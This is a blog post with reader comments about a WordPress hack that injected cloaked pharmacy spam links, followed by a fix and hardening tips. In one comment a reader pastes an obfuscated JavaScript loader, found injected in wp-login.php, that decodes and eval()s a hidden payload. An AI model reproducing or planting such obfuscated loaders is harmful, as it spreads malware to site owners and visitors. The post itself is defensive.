Has Your Wordpress Blog Been Hacked?

In Affiliate Marketing | 35 comments | permalink

If you own a Wordpress blog, you may have been hacked, but what’s worse, you may not even know that you have been exploited.

This happened to me recently, and today I want to ensure that every Wordpress reader not only knows how to detect this problem, but how to fix the problem & how to protect your site from future attacks.

Ok, here is the thing… like most marketers, my technical skills are not very good, but like most marketers, I have a lot of very useful contacts. So I contacted a good friend of mine (Paul from SEOidiot)

Paul takes up the story below:

What Happened To DeanHunt.com – By Paul

Here’s the technical side of what they did and what we did to get around it, plus a brief explanation of what I coded to try and give people the chance to check for themselves: -

Wordpress uses calls to wp_head and wp_footer to allow plugins to alter the content being returned as the page loads, a good example of this working well would be the SEO Title Tags plugin. However this is the functionality that the spammers used to insert a whole raft of links into the footer.

This article [http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/] explains the technique for anyone who likes headaches, but in basic terms they are using compromised theme files or adding in new files to your compromised server which act on the wp_footer call to insert their links.

They have been even smarter than that though as they have cloaked the links, so if you pop over to your own hacked site and view the source code you wont see the inserted links. Only when Googlebot comes along are the links shown, which is obviously a bad thing as Google suddenly thinks you’re linking out to a bunch of parasite hosted pills sites and will give you a penalty or remove you as a result.

Note: Dean’s rankings were virtually wiped out in Google

The Solution

So how to solve this? On a dedicated box you can trawl through searching for the files known to be compromised but a simpler and easier method is to remove the wp_footer call from the footer.php file in your current theme.

There are very few plugins that do anything useful in the footer so this made sense for Dean. If it had been the WP_head that was inserting links we would have needed to get the host to find the dodgy files or perhaps to have moved to a clean install somewhere else.

Because it isn’t easy for people to detect when they have been hacked this way I wrote a little tool to show people what their Google cache thinks are links out from your page, you can find this free tool at http://www.seoidiot.co.uk/cachecheker/

Back to Dean….

So in a nutshell, your Wordpress blog may have been hacked, and the usual checks won’t show anything wrong. You may only realise something is wrong once you have been booted out of Google.

I am happy to announce that my Google rankings returned within 4 days of the offending spam being removed, which just shows once more why Google are by far the king of the search world.

So how can you prevent this happening to your Wordpress site?

Firstly, and perhaps most importantly, make sure your Wordpress is up to date. If you remain with the latest version at all times, you stand a much better chance of never having these issues.

For the more technically minded amongst you, i got some great tips from Matt Cutts, and this post I hope that considering the circumstances, Matt won’t mind me posting his tips below:

  1. Secure your /wp-admin/ directory. What I’ve done is lock down /wp-admin/ so that only certain IP addresses can access that directory. I use an .htaccess file, which you can place directly at /wp-admin/.htaccess . This is what mine looks like:

    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName “Access Control”
    AuthType Basic
    order deny,allow
    deny from all
    # whitelist home IP address
    allow from 64.233.169.99
    # whitelist work IP address
    allow from 69.147.114.210
    allow from 199.239.136.200
    # IP while in Kentucky; delete when back
    allow from 128.163.2.27

    I’ve changed the IP addresses, but otherwise that’s what I use. This file says that the IP address 64.233.169.99 (and the other IP addresses that I’ve whitelisted) are allowed to access /wp-admin/, but all other IP addresses are denied access. Has this saved me from being hacked before? Yes.

  2. Make an empty wp-content/plugins/index.html file. Otherwise you leak information on which plug-ins you run. If someone wanted to hack your blog, they might be able to do it by discovering that you run an out-of-date plugin on your blog and then they could exploit that.
  3. Subscribe to the WordPress Development blog at http://wordpress.org/development/feed/ . When WordPress patches a security hole or releases a new version, they announce it on that blog. If you see a security patch released, you need to upgrade or apply the patch. You leave yourself open to being hacked if you don’t upgrade.

And here’s a bonus tip: in the header.php file for your theme, you might want to check for a line like

<meta name=”generator” content=”WordPress <?php bloginfo(’version’); ?>” /> <!-– leave this for stats please -->

I’d just go ahead and delete that line or at least the bloginfo(’version’). If you’re running an older version of WordPress, anyone can view source to see what attacks might work against your blog.

Credit to Matt, Reuben and my buddy ShoeMoney I also got a lot of assistance from David Geere from the awesome EatingBritain. Oh, and David Naylor was incredibly helpful as well. Thanks David.

What’s Next For My Wordpress Site’s Security?

Myself and Dave are looking to do a fresh install of Wordpress, and we will also be looking into any plugins that can further assist us.

If you have any advice or tips based on the above, please leave them in the comments box. Also, send this post to any friends who have a Wordpress site, I would hate for them to go through the hell that I had to suffer.

A wise man once told me: “what doesn’t kill you, only makes you stronger”, together we can ensure we are all strong enough to avoid this sort of issue in future.

Dean

email this | tag this | digg this | trackback | comment RSS feed

Subscribe to my FEED or don't. Frankly I don't care

35 COMMENTS

35 comments for this post.

  1. Comment from Nathan Gilder on :

    Thanks for the tool, Paul – look at fixing the posted link though. Checked a few of my blogs and they’re looking okay for now.

    Dean, thanks for getting the word out. I’m digging the article.

  2. Comment from Craig Dewe on :

    Thanks for the post and detailed explanation Dean… and glad to hear you’ve got it sorted!

    *runs off to check his blogs*

  3. Comment from Dean Hunt on :

    Link fixed, thanks Nathan.

    make sure you all use the free tool to check your sites.

  4. Comment from Steven-Sanders on :

    There are alot more things you can do as well with security, and an easier way to not display the directory structure for folders that do not contain and index file.

    Vist my site for more info:

    http://www.steven-sanders.com/establishing-a-sense-of-security-on-your-blog/

  5. Comment from Jo on :

    hi there,
    I just wonder, inside cpanel there is a feature called “Index Manager”, i found that it’s very useful, we can set “No indexing” for those folders that we don’t want google index it.

    what do you think ?

  6. Comment from Dean Hunt on :

    Jo,

    Yes, that would help… I think Steven mentions something similar in his post (see above).

    Dean

  7. Comment from Sandrine on :

    Thanks for sharing this with us Dean! I’ll run to my blog right away to make sure it’s OK and will tag your post on Stumble Upon too.

  8. Comment from Dean Hunt on :

    Many thanks,

    Joel Commm just mentioned it on his Facebook profile, and it is buzzing around Twitter as well.

    Dean

  9. Comment from Deborah a.k.a. Loxly on :

    I use the Exploit Scanner plugin for Wordpress found here:

    http://ocaoimh.ie/exploit-scanner/

    I was hacked in a way that they were able to insert invisible links into the last post made. They didn’t add them to any other posts, just the last one, and it included iframes that loaded malware. I had sites that didn’t just get penalized by Google, but that Google BLOCKED users completely from because they were dangerous.

    I did a clean install on all the blogs affected, then installed this plugin and run it regularly.

  10. Comment from Robert Fowler on :

    Thanks for sharing your story and the tool Dean. I also sent out a tweet on twitter referencing this post.

    You need to find new hamsters, or better crack, I reckon :)

  11. Comment from Dean Hunt on :

    Thanks Rob,

    You are a gent. We gotta play some golf some time.

    Dean

  12. Comment from Patrick Altoft on :

    How about my Google Alerts solution?
    http://www.blogstorm.co.uk/how-to-use-google-alerts-to-find-out-if-your-site-gets-hacked/

  13. Comment from Dean Hunt on :

    Patrick,

    Interesting theory.

    My concern would be the terms used were quite niche pills, so you would need a list of 50-100 of the main ones, and inputting all of that would be time consuming.

    That said, I am sure someone can create a script to automate it.

    Dean

  14. Comment from Axethem on :

    There is nothing worse than showing up to your website and seeing a bunch of links to some spam site.

  15. Comment from Dean Hunt on :

    Very true Axethem.

    Unfortunately these were not even visibile links.

    Dean

  16. Comment from Robert on :

    Hi Dean,

    this is exactly what happened to me several months ago. The thing was there were no links visible on the site but after seeing my PR suddenly drop from 4 to 0 I checked the code source and there it was. Bunch of links to crappy sites. I was able to fix the problem and now I check everything on regular basis.
    Thanks for the tool and info, it really helps.

    By the way how did you manage to get your PR back to 5 so quickly? My site has never recovered and remains PR 0.

  17. Comment from @CoachDeb on :

    or – instead of doing all of the above…
    you just get yourself on a more advanced blogging platform http://BLOGi360.com

    Most people don’t realize WordPress is one of the most hackable blogging platforms out there.

    Security is of utmost importance if information on your blog supports your business.

    TX 4 sharing this.
    I’ll go retweet now…

  18. Comment from Linda P Taylor on :

    This happened to me!!! My site was hacked and was eventually blocked by Google as “evil”. Even moving it to another web address did not help. I finally moved to Typepad and am paying a fee to keep these evil doers out of my creations! Wished I had seen this blog 3 months ago!

    Pay attention everyone on Wordpress!!!

    Linda P. Taylor
    http://www.LindaPTaylor.com
    Blog: http://www.AskLindaPTaylor.com

  19. Comment from Marc Beharry on :

    Thanks a bunch for this dude, i know how you feel. it has happened to me several times now :(

  20. Comment from Simon on :

    I know this may not be the correct forum for this, but can anyone help? I followed the .htaccess route above, replacing the ip with the one shown for me at http://www.whatismyip.com, and it locks me out completely. I have to use FTP to delete the file.

    Am I missing something? Any ideas?

  21. Comment from Johnny T on :

    Nice tips, particularly about the .htacess file in the wp-admin directory. Cheers

  22. Comment from Simon on :

    Sorry – never mind! I copied and pasted from above, but it has “ rather than ”

    All set now.

  23. Comment from Jeff McNeill on :

    A wise man? So you spoke with Nietzsche directly?

  24. Comment from chesty on :

    Where is the text, urls, etc, usually stored? (I mean the dodgy ones from the attacker) In the db or in one of the files?

    If the text is stored in a file, a regular cron job to grep for keywords might be the go, otherwise if it’s in the db, it’s a little more work, but a regular db search would be handy.

    I’m interested in developing something i can run on my server automagically, rather than manually checking.

  25. Comment from The Adsense Idiot on :

    I discovered yesterday when logging into wp-login that someone had hacked several of my WP blogs. These sites are all running the latest version of wordpress.

    The hackers have somehow put a line of code into wp-login.php (see below)

    !function tzhrbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,37,0,36,5,43,54,33,1,62,0,0,0,0,0,0,25,17,21,41,51
    ,52,49,40,46,53,30,4,31,29,35,56,27,38,45,44,47,24,32,10,34,58,3,0,0,0,0,18,0,50,7,2,14,12,19,22,
    23,13,11,59,15,6,48,61,8,39,57,28,20,60,26,55,42,16,9);for(i=Math.ceil(h/k);i>0;i–){c=”;for(s=Math.min(h,k);s>0;s–,h–){{j|=(t[p.charCodeAt(z++)-48])<>=8;d-=2}else{d=6}}}eval(c);}}tzhrbn15(‘@LenWbs626R6l5o6Ml@XxbenjqU1WbsDPlua25iV@DoFvTS7zW
    rFpDoDZTSN20unjlrDjNuqiwSNMDMDfaGFv5RwtmUV@9SaWLS6bben2JenpbsVvbU3zgOOl5RF2aMnPZSa
    md9DvPeVs0enWbunmJp7vJr1Mar74QODjNuqiwsX4QpNdQoFW5RFfx@qgYGFjLsam5o3L9CQd6R6hjuafa
    GabwRwc0uItcsn2TeNyW@VbNewlluayQO7′)

    Is this the same hack ?

    Thanks

  26. Comment from Dean Hunt on :

    Adsense Idiot

    I checked my wp-login.php, and I couldn’t find anything wrong with it.

  27. Comment from The Adsense Idiot on :

    Thanks Dean,

    I also found this malicious script in my theme folder in header.php and footer.php

    Thanks for your reply

  28. Comment from Hacker Forums on :

    Most all blog hacks are from people not upgrading their blog software.

    If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.

    http://www.hackerforums.org

  29. Comment from Internationalhardman on :

    My mates wordpress blog got hacked a while ago… it just redirects to some russian search engine now. Dunno how to fix it.

  30. Comment from awii9667 on :

    In different Blogs , hacking can be done .Beware of this while writing your Blogs

  31. Comment from UNiHacker on :

    A few tips to help bloggers stay hack free.

    #1 Backup your database once a week, or get a script to email it to you automatically.

    #2 Keep your blog software up-to-date.

    #3 Use stronger password, 2 uppercase, 2 lowercase, 2 numbers, 2 special characters should do it.

    Spending a few minutes a week doing this can save a lot of trouble from hackers in the long run.

    Hacker Forums

  32. Comment from pnda on :

    Well guys , Thanks for your good information.I have come accross similar situation .I was searching the web to get some ideas finally find the following link which also has three good articles on malware problem , scanning and security …

    http://www.itoneworldsystem.com/blog/2009/01/29/how-to-scan-blogweb-site-for-malicious-codes/

  33. Comment from cat on :

    Thanks for this post – I just checked all my WP sites using the tool you linked to, and a couple of my old WP blogs which I haven’t touched in ages do indeed have dody footer links. One of them is even displaying pharma-related Adsense ads! I will be more diligent about keeping all my WP sites updated from now on.

  34. Comment from Steen Öhman on :

    Very interesting post. Run 4-5 wordpress sites/blogs and allways try to update my system – but still some new and usefull tips here.

    I really like wordpress, but if so many people use a product – then it attracts the hackers.

    Steen Öhman
    Öhman Research – online marketing
    Denmark

  35. Comment from mssmotorrd on :

    It’s the first time I commented here and I must say you share us genuine, and quality information for bloggers! Good job.
    p.s. You have a very good template for your blog. Where did you find it?

Leave a Comment


CommentLuv Enabled